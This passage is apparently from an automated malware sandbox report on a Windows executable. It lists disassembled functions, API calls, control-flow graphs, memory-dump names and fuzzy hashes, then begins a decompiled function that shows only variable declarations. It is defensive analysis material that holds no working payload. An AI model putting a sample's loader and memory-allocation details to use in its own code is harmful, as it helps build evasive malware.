      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: Sleep
      • String ID:
      • API String ID: 3472027048-0
      • Opcode ID: 9d5c626ebdc90fe57a8f02de8bf034ac3f1c4b0e0aa204bb20e5ce31d04646b5
      • Instruction ID: e0b614ee9ddd125cf835ca931cef3cd6a40451fdb7ab989aa96913ea8037bb72
      • Opcode Fuzzy Hash: 9d5c626ebdc90fe57a8f02de8bf034ac3f1c4b0e0aa204bb20e5ce31d04646b5
      • Instruction Fuzzy Hash: 2BC12672601B218BE715CF69E884357BBA0FB86310F08827FD455AB7D6D3B4A841CF94
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004099C8 Relevance: 4.6, APIs: 3, Instructions: 95threadCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 6678 4099c8-4099e2 6679 4099e4-4099f0 call 4098a8 call 409930 6678->6679 6680 4099f5-4099fc 6678->6680 6679->6680 6681 4099fe-409a09 GetCurrentThreadId 6680->6681 6682 409a1f-409a23 6680->6682 6681->6682 6685 409a0b-409a1a call 409600 call 409904 6681->6685 6686 409a25-409a29 6682->6686 6687 409a3d-409a41 6682->6687 6685->6682 6686->6687 6690 409a2b-409a3b 6686->6690 6691 409a43-409a46 6687->6691 6692 409a4d-409a51 6687->6692 6690->6687 6691->6692 6693 409a48-409a4a 6691->6693 6695 409a70-409a79 call 409628 6692->6695 6696 409a53-409a5c call 406f34 6692->6696 6693->6692 6705 409a80-409a85 6695->6705 6706 409a7b-409a7e 6695->6706 6696->6695 6704 409a5e-409a6e call 407eac call 406f34 6696->6704 6704->6695 6708 409aa1-409aac call 409600 6705->6708 6709 409a87-409a95 call 40d998 6705->6709 6706->6705 6706->6708 6717 409ab1-409ab5 6708->6717 6718 409aae 6708->6718 6709->6708 6716 409a97-409a99 6709->6716 6716->6708 6720 409a9b-409a9c FreeLibrary 6716->6720 6721 409ab7-409ab9 call 409904 6717->6721 6722 409abe-409ac1 6717->6722 6718->6717 6720->6708 6721->6722 6724 409ac3-409aca 6722->6724 6725 409ada-409aeb 6722->6725 6726 409ad2-409ad5 ExitProcess 6724->6726 6727 409acc 6724->6727 6725->6687 6727->6726
      APIs
      • GetCurrentThreadId.KERNEL32 ref: 004099FE
      • FreeLibrary.KERNEL32(00400000,?,?,00000000,00000000,00409B02,00409B1C,?,?,00410258,?,00410287,00000000,0040BE49), ref: 00409A9C
      • ExitProcess.KERNEL32(00000000,?,?,00000000,00000000,00409B02,00409B1C,?,?,00410258,?,00410287,00000000,0040BE49), ref: 00409AD5
        • Part of subcall function 00409930: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004099EE,?,?,00000000,00000000,00409B02,00409B1C,?,?,00410258), ref: 00409969
        • Part of subcall function 00409930: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004099EE,?,?,00000000,00000000,00409B02,00409B1C), ref: 0040996F
        • Part of subcall function 00409930: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004099EE,?,?,00000000), ref: 0040998A
        • Part of subcall function 00409930: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004099EE,?,?), ref: 00409990
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
      • String ID:
      • API String ID: 3490077880-0
      • Opcode ID: a714fe92b39ed14490b611ae5c11bbaa265d7e525db085804be7d0cbcc5123eb
      • Instruction ID: fc87ae00a40ca9010a61f879a68eb7114013704e751213f5dd5063859d298e3e
      • Opcode Fuzzy Hash: a714fe92b39ed14490b611ae5c11bbaa265d7e525db085804be7d0cbcc5123eb
      • Instruction Fuzzy Hash: F2316B70B00B819BEB20AB6A888875B77D0AB45314F14493FE546A6BD3D77CDC84CF69
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0040D654 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 6728 40d654-40d696 call 409d7c * 2 call 409c98 6735 40d750-40d76a call 409cf8 6728->6735 6736 40d69c-40d6ac call 40a0c0 6728->6736 6741 40d6b3-40d6b8 6736->6741 6742 40d6ae-40d6b1 6736->6742 6743 40d6ba-40d6c3 6741->6743 6744 40d6df-40d6ee call 40d390 6741->6744 6742->6741 6745 40d6c5-40d6d8 call 40acec 6743->6745 6746 40d6da-40d6dd 6743->6746 6750 40d6f0-40d6fd call 40d4bc 6744->6750 6751 40d6ff-40d71c GetUserDefaultUILanguage call 40cd40 call 40d4bc 6744->6751 6745->6744 6746->6743 6746->6744 6750->6735 6759 40d741-40d744 6751->6759 6760 40d71e-40d725 6751->6760 6759->6735 6762 40d746-40d74b call 40d588 6759->6762 6760->6759 6761 40d727-40d73c GetSystemDefaultUILanguage call 40cd40 call 40d4bc 6760->6761 6761->6759 6762->6735
      APIs
      • GetUserDefaultUILanguage.KERNEL32(00000000,0040D76B,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040D7F2,00000000,?,00000105), ref: 0040D6FF
      • GetSystemDefaultUILanguage.KERNEL32(00000000,0040D76B,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040D7F2,00000000,?,00000105), ref: 0040D727
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: DefaultLanguage$SystemUser
      • String ID:
      • API String ID: 384301227-0
      • Opcode ID: f2f07d34f477fa6367a2f3e5149fce3cc676ec280a34424e823ddb1368fb7f71
      • Instruction ID: 44059ba97bbf9bf285afe4e6d176834ad347bb586a67322e71495ef5113fc533
      • Opcode Fuzzy Hash: f2f07d34f477fa6367a2f3e5149fce3cc676ec280a34424e823ddb1368fb7f71
      • Instruction Fuzzy Hash: CB310E30E102099BDB10EBE9C881AAEB7B5EF44314F50487BE401B73D5D7B9AD89CA59
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0040D778 Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON
      Download Yara Rule
      APIs
      • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040D832,?,?,00000000,?,0040C530,?,?,0000020A,?,00000000,0040C570), ref: 0040D7B4
      • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040D832,?,?,00000000,?,0040C530,?,?,0000020A), ref: 0040D805
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: FileLibraryLoadModuleName
      • String ID:
      • API String ID: 1159719554-0
      • Opcode ID: f0961c1b59299fbeccd5692c5aa1507862732f044e1165cca221ee21f70ce639
      • Instruction ID: 25bc01ecb4b5ff9ba6bc05304ed11019952474bef5b0b477e3698cfb6d465b5b
      • Opcode Fuzzy Hash: f0961c1b59299fbeccd5692c5aa1507862732f044e1165cca221ee21f70ce639
      • Instruction Fuzzy Hash: 60114F71E4461CABDB10EFA4C886BDE73B8DB14304F5144BAB508B72D1DA785E848E99
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00409628 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
      Download Yara Rule
      APIs
      • KiUserCallbackDispatcher.NTDLL(00000000,00409676,?,008A5000,008ADB9C,00000000,008AB058,00409A75,?,?,00000000,00000000,00409B02,00409B1C), ref: 00409666
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: CallbackDispatcherUser
      • String ID:
      • API String ID: 2492992576-0
      • Opcode ID: 92e7d51bb77901ad1b416735c23e2e21e9d1d0693fd81f53d29047fe0225b910
      • Instruction ID: 8671b5dbc46b479544e1c1bf493573795b09545862dd169746a8134d61a541b6
      • Opcode Fuzzy Hash: 92e7d51bb77901ad1b416735c23e2e21e9d1d0693fd81f53d29047fe0225b910
      • Instruction Fuzzy Hash: 83F02B312017019FE3215F5AA890E53BB9CFB457607520937DC08D3A92C2369C01C9A5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0040C504 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
      Download Yara Rule
      APIs
      • GetModuleFileNameW.KERNEL32(?,?,0000020A,?,00000000,0040C570,?,?,0040F130), ref: 0040C522
        • Part of subcall function 0040D778: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040D832,?,?,00000000,?,0040C530,?,?,0000020A,?,00000000,0040C570), ref: 0040D7B4
        • Part of subcall function 0040D778: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040D832,?,?,00000000,?,0040C530,?,?,0000020A), ref: 0040D805
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: FileModuleName$LibraryLoad
      • String ID:
      • API String ID: 4113206344-0
      • Opcode ID: e401f4025b18fde4cedafd8461d3ecfecea5f060ef9850e24f80275889b77d95
      • Instruction ID: 8b4822f9e8370efb8aa716ab2bdff0f3c9155800fc7c75105fa7cf001df46ced
      • Opcode Fuzzy Hash: e401f4025b18fde4cedafd8461d3ecfecea5f060ef9850e24f80275889b77d95
      • Instruction Fuzzy Hash: 56E0EDB5A003209BCB10DFA8D8C5A5737D8AB08754F444AA6AD14EF386D375DD148BD5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 02766485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
      Download Yara Rule
      APIs
      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 027664D6
      Memory Dump Source
      • Source File: 00000000.00000002.258419981.0000000002766000.00000040.00000800.00020000.00000000.sdmp, Offset: 02766000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_2766000_file.jbxd
      Yara matches
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
      • Instruction ID: 2c0b9a6af8080676fc99bd70a221201c8ca2f623e769095e5fcbedc7970ba9ba
      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
      • Instruction Fuzzy Hash: A0113F79A00208EFDB01DF98C989E99BBF5AF08350F458094F9489B361D375EA90DF80
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0040564C Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
      Download Yara Rule
      APIs
      • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,00405C63,FFFFFFDC,00405936), ref: 00405663
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: 8f9877d62318573364b680f58bdd96403b1a30c6e5fd2d7d74d0ea7d8677bd8a
      • Instruction ID: 3e16d2164f8d2a5e8943222f2ffc1f9b9339b7b612c7f5e044403cd305a8c0ed
      • Opcode Fuzzy Hash: 8f9877d62318573364b680f58bdd96403b1a30c6e5fd2d7d74d0ea7d8677bd8a
      • Instruction Fuzzy Hash: E2F0AFF2B023214FE7149F789D417467BD5F706354F10417EE909EBB9AE7B098018B84
      Uniqueness

      Uniqueness Score: -1.00%

      Non-executed Functions

      Function 0085E760 Relevance: 153.2, APIs: 12, Strings: 73, Instructions: 4411COMMON
      Download Yara Rule
      C-Code - Quality: 78%
      			E0085E760(void* __ebx, void* __edi, void* __esi) {
				struct HINSTANCE__* _v8;
				char _v12;
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v84;
				char _v85;
				char _v86;
				char _v87;
				char _v88;
				char _v89;
				char _v90;
				char _v91;
				char _v92;
				char _v93;
				char _v94;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				char _v101;
				char _v102;
				char _v103;
				char _v104;
				char _v105;
				intOrPtr _v112;
				char _v113;
				char _v114;
				char _v115;
				intOrPtr _v120;
				char _v121;
				char _v122;
				char _v123;
				char _v124;
				char _v125;
				char _v126;
				char _v127;
				char _v128;
				char _v129;
				char _v130;
				char _v131;
				char _v132;
				char _v133;
				char _v134;
				char _v135;
				char _v136;
				char _v137;
				char _v138;
				char _v139;
				char _v140;
				char _v141;
				char _v142;
				char _v148;
				char _v149;
				char _v150;
				char _v151;
				char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				char _v157;
				char _v158;
				char _v159;
				char _v160;
				char _v161;
				char _v162;
				char _v163;
				char _v168;
				char _v169;
				char _v170;
				char _v171;
				char _v204;
				char _v328;
				char _v344;
				char _v368;
				char _v376;
				char _v412;
				char _v416;
				char _v420;
				signed int _v424;
				char _v432;
				char _v440;
				char _v448;
				char _v456;
				char _v468;
				char _v480;
				char _v492;
				char _v504;
				char _v520;
				char _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				char _v572;
				char _v576;
				char _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				char _v608;
				char _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				char _v624;
				char _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				char _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				char _v708;
				char _v712;
				intOrPtr _v716;
				intOrPtr _v720;
				intOrPtr _v724;
				intOrPtr _v728;
				intOrPtr _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				intOrPtr _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				intOrPtr _v760;
				intOrPtr _v764;
				intOrPtr _v768;
				intOrPtr _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v784;
				intOrPtr _v788;
				char _v792;
				intOrPtr _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _v816;
				intOrPtr _v820;
				intOrPtr _v824;
				intOrPtr _v828;
				intOrPtr _v832;
				intOrPtr _v836;
				intOrPtr _v840;
				intOrPtr _v844;
				intOrPtr _v848;
				intOrPtr _v852;
				intOrPtr _v856;
				intOrPtr _v860;
				intOrPtr _v864;
				intOrPtr _v868;
				char _v872;
				intOrPtr _v876;
				intOrPtr _v880;
				intOrPtr _v884;
				intOrPtr _v888;
				intOrPtr _v892;
				intOrPtr _v896;
				intOrPtr _v900;
				intOrPtr _v904;
				intOrPtr _v908;
				intOrPtr _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				intOrPtr _v924;
				intOrPtr _v928;
				intOrPtr _v932;
				char _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				intOrPtr _v952;
				intOrPtr _v956;
				intOrPtr _v960;
				intOrPtr _v964;
				intOrPtr _v968;
				intOrPtr _v972;
				intOrPtr _v976;
				intOrPtr _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				intOrPtr _v992;
				char _v996;
				intOrPtr _v1000;
				intOrPtr _v1004;
				intOrPtr _v1008;
				intOrPtr _v1012;
				intOrPtr _v1016;
				intOrPtr _v1020;
				intOrPtr _v1024;
				intOrPtr _v1028;
				intOrPtr _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				char _v1044;
				char _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				intOrPtr _v1060;
				intOrPtr _v1064;
				intOrPtr _v1068;
				intOrPtr _v1072;
				intOrPtr _v1076;
				char _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				char _v1108;
				char _v1112;
				char _v1116;
				char _v1132;
				char _v1148;
				char _v1164;
				char _v1184;
				char _v1204;
				char _v1224;
				char _v1244;
				char _v1268;
				char _v1292;
				char _v1316;
				char _v1340;
				char _v1368;
				char _v1396;
				char _v1424;
				char _v1452;
				char _v1456;
				char _v1460;
				char _v1464;
				intOrPtr _v1468;
				intOrPtr _v1472;
				intOrPtr _v1476;
				char _v1480;
				intOrPtr _v1484;
				intOrPtr _v1488;
				intOrPtr _v1492;
				intOrPtr _v1496;
				intOrPtr _v1500;
				intOrPtr _v1504;
				intOrPtr _v1508;
				intOrPtr _v1512;
				intOrPtr _v1516;
				intOrPtr _v1520;
				intOrPtr _v1524;
				intOrPtr _v1528;
				intOrPtr _v1532;
				char _v1536;
				intOrPtr _v1540;
				intOrPtr _v1544;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				char _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				intOrPtr _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				char _v1668;
				intOrPtr _v1672;
				intOrPtr _v1676;
				intOrPtr _v1680;
				intOrPtr _v1684;
				intOrPtr _v1688;
				intOrPtr _v1692;
				intOrPtr _v1696;
				intOrPtr _v1700;
				intOrPtr _v1704;
				intOrPtr _v1708;
				intOrPtr _v1712;
				intOrPtr _v1716;
				intOrPtr _v1720;
				intOrPtr _v1724;
				intOrPtr _v1728;
				char _v1732;
				char _v1736;
				char _v1740;
				intOrPtr _v1744;
				intOrPtr _v1748;
				intOrPtr _v1752;
				intOrPtr _v1756;
				intOrPtr _v1760;
				intOrPtr _v1764;
				intOrPtr _v1768;
				intOrPtr _v1772;
				intOrPtr _v1776;
				intOrPtr _v1780;
				intOrPtr _v1784;
				intOrPtr _v1788;
				intOrPtr _v1792;
				intOrPtr _v1796;
				intOrPtr _v1800;
				intOrPtr _v1804;
				intOrPtr _v1808;
				intOrPtr _v1812;
				char _v1816;
				char _v1820;
				intOrPtr _v1824;
				intOrPtr _v1828;
				intOrPtr _v1832;
				intOrPtr _v1836;
				intOrPtr _v1840;
				intOrPtr _v1844;
				intOrPtr _v1848;
				intOrPtr _v1852;
				intOrPtr _v1856;
				intOrPtr _v1860;
				intOrPtr _v1864;
				intOrPtr _v1868;
				intOrPtr _v1872;
				intOrPtr _v1876;
				intOrPtr _v1880;
				intOrPtr _v1884;
				intOrPtr _v1888;
				intOrPtr _v1892;
				intOrPtr _v1896;
				intOrPtr _v1900;
				char _v1904;
				char _v1908;
				intOrPtr _v1912;
				intOrPtr _v1916;
				intOrPtr _v1920;
				intOrPtr _v1924;
				intOrPtr _v1928;
				intOrPtr _v1932;
				char _v1936;
				char _v1940;
				intOrPtr _v1944;
				intOrPtr _v1948;
				intOrPtr _v1952;
				intOrPtr _v1956;
				intOrPtr _v1960;
				intOrPtr _v1964;
				intOrPtr _v1968;
				intOrPtr _v1972;
				intOrPtr _v1976;
				intOrPtr _v1980;
				intOrPtr _v1984;
				intOrPtr _v1988;
				intOrPtr _v1992;
				intOrPtr _v1996;
				intOrPtr _v2000;
				intOrPtr _v2004;
				intOrPtr _v2008;
				intOrPtr _v2012;
				intOrPtr _v2016;
				intOrPtr _v2020;
				intOrPtr _v2024;
				intOrPtr _v2028;
				intOrPtr _v2032;
				intOrPtr _v2036;
				intOrPtr _v2040;
				intOrPtr _v2044;
				intOrPtr _v2048;
				intOrPtr _v2052;
				intOrPtr _v2056;
				intOrPtr _v2060;
				intOrPtr _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				char _v2076;
				char _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				intOrPtr _v2092;
				char _v2096;
				char _v2100;
				char _v2212;
				char _v2528;
				char _v2532;
				char _v2580;
				char _v2612;
				char _v2640;
				char _v2988;
				char _v3016;
				char _v3036;
				char _v3396;
				char _v3456;
				char _v3468;
				char _v3792;
				char _v3828;
				char _v3844;
				char _v4172;
				char _v4176;
				char _v4212;
				char _v4604;
				char _v4624;
				char _v4628;
				char _v4852;
				char _v4856;
				char _v4900;
				char _v4980;
				char _v4984;
				char _v5012;
				char _v5316;
				char _v5320;
				char _v5408;
				intOrPtr _t1874;
				signed int _t1892;
				intOrPtr* _t1898;
				intOrPtr* _t1903;
				intOrPtr* _t1908;
				intOrPtr* _t1913;
				intOrPtr _t1991;
				signed int _t1993;
				intOrPtr _t1994;
				signed int _t2000;
				signed int _t2004;
				signed int _t2009;
				intOrPtr _t2010;
				signed int _t2012;
				signed int _t2014;
				signed int _t2015;
				char* _t2016;
				char* _t2019;
				char* _t2024;
				char* _t2033;
				char* _t2038;
				char* _t2043;
				signed int _t2048;
				signed int _t2155;
				intOrPtr _t2156;
				signed int _t2157;
				signed int _t2158;
				signed int _t2160;
				signed int _t2162;
				signed int _t2163;
				intOrPtr _t2168;
				signed int _t2176;
				signed int _t2179;
				signed int _t2181;
				intOrPtr _t2183;
				signed int _t2190;
				signed int _t2192;
				intOrPtr _t2194;
				signed int _t2197;
				signed int _t2198;
				signed int _t2199;
				intOrPtr _t2201;
				signed int _t2203;
				intOrPtr _t2204;
				intOrPtr _t2205;
				intOrPtr _t2208;
				intOrPtr _t2210;
				intOrPtr _t2213;
				signed int _t2215;
				intOrPtr _t2217;
				intOrPtr _t2219;
				signed int _t2223;
				signed int _t2229;
				signed int _t2237;
				signed int _t2239;
				intOrPtr _t2241;
				signed int _t2242;
				intOrPtr* _t2252;
				intOrPtr* _t2257;
				intOrPtr* _t2262;
				intOrPtr* _t2267;
				intOrPtr* _t2334;
				intOrPtr* _t2339;
				intOrPtr* _t2344;
				intOrPtr* _t2394;
				intOrPtr* _t2399;
				intOrPtr* _t2404;
				signed int _t2451;
				signed int _t2453;
				signed int _t2455;
				signed int _t2456;
				signed int _t2457;
				signed int _t2458;
				signed int _t2460;
				signed int _t2462;
				signed int _t2466;
				signed int _t2467;
				signed int _t2469;
				signed int _t2475;
				intOrPtr* _t2481;
				intOrPtr* _t2486;
				intOrPtr* _t2491;
				signed int _t2539;
				intOrPtr* _t2543;
				intOrPtr* _t2548;
				intOrPtr* _t2553;
				intOrPtr* _t2592;
				intOrPtr* _t2597;
				intOrPtr* _t2632;
				intOrPtr* _t2637;
				intOrPtr* _t2642;
				intOrPtr _t2687;
				intOrPtr* _t2695;
				intOrPtr* _t2700;
				intOrPtr* _t2705;
				signed int _t2745;
				intOrPtr _t2748;
				signed int _t2749;
				signed int _t2751;
				intOrPtr* _t2753;
				intOrPtr* _t2758;
				intOrPtr* _t2763;
				intOrPtr* _t2768;
				signed int _t2814;
				signed int _t2815;
				signed int _t2818;
				signed int _t2819;
				signed int _t2820;
				intOrPtr* _t2825;
				intOrPtr* _t2830;
				intOrPtr* _t2835;
				intOrPtr _t2876;
				intOrPtr* _t2885;
				intOrPtr* _t2890;
				intOrPtr* _t2895;
				intOrPtr* _t2938;
				intOrPtr* _t2943;
				intOrPtr* _t2948;
				intOrPtr* _t2953;
				intOrPtr* _t2958;
				intOrPtr* _t3012;
				intOrPtr* _t3017;
				intOrPtr* _t3022;
				intOrPtr* _t3027;
				intOrPtr* _t3032;
				intOrPtr* _t3037;
				intOrPtr* _t3105;
				intOrPtr* _t3110;
				intOrPtr* _t3115;
				intOrPtr* _t3120;
				intOrPtr* _t3125;
				intOrPtr* _t3130;
				intOrPtr* _t3151;
				intOrPtr* _t3156;
				intOrPtr* _t3161;
				intOrPtr* _t3166;
				intOrPtr* _t3194;
				intOrPtr* _t3199;
				intOrPtr* _t3204;
				intOrPtr* _t3246;
				intOrPtr* _t3251;
				intOrPtr* _t3256;
				intOrPtr* _t3275;
				intOrPtr* _t3280;
				intOrPtr* _t3285;
				signed int _t3318;
				signed int _t3320;
				signed int _t3329;
				signed int _t3331;
				signed int _t3333;
				intOrPtr _t3334;
				signed int _t3335;
				signed int _t3336;
				signed int _t3337;
				intOrPtr _t3338;
				intOrPtr _t3340;
				intOrPtr _t3343;
				signed int _t3345;
				signed int _t3348;
				signed int _t3350;
				intOrPtr _t3352;
				intOrPtr _t3360;
				signed int _t3362;
				signed int _t3364;
				signed int _t3366;
				intOrPtr _t3369;
				signed int _t3371;
				signed int _t3374;
				signed int _t3375;
				signed int _t3377;
				signed int _t3378;
				intOrPtr _t3379;
				signed int _t3392;
				signed int _t3394;
				signed int _t3396;
				intOrPtr _t3398;
				signed int _t3399;
				signed int _t3400;
				signed int _t3404;
				signed int _t3407;
				signed int _t3408;
				char* _t3420;
				char* _t3423;
				char* _t3428;
				char* _t3433;
				char* _t3438;
				char* _t3443;
				char* _t3448;
				char* _t3453;
				char* _t3462;
				char* _t3467;
				char* _t3472;
				char* _t3493;
				char* _t3496;
				char* _t3501;
				char* _t3510;
				char* _t3515;
				char* _t3524;
				char* _t3529;
				char* _t3534;
				char* _t3543;
				char* _t3548;
				char* _t3553;
				char* _t3558;
				char* _t3567;
				char* _t3572;
				char* _t3577;
				char* _t3582;
				char* _t3587;
				char* _t3592;
				char* _t3597;
				char* _t3602;
				char* _t3607;
				char* _t3616;
				intOrPtr _t3660;
				signed int _t3663;
				signed int _t3666;
				signed int _t3668;
				signed int _t3670;
				signed int _t3672;
				signed int _t3674;
				intOrPtr _t3675;
				signed int _t3677;
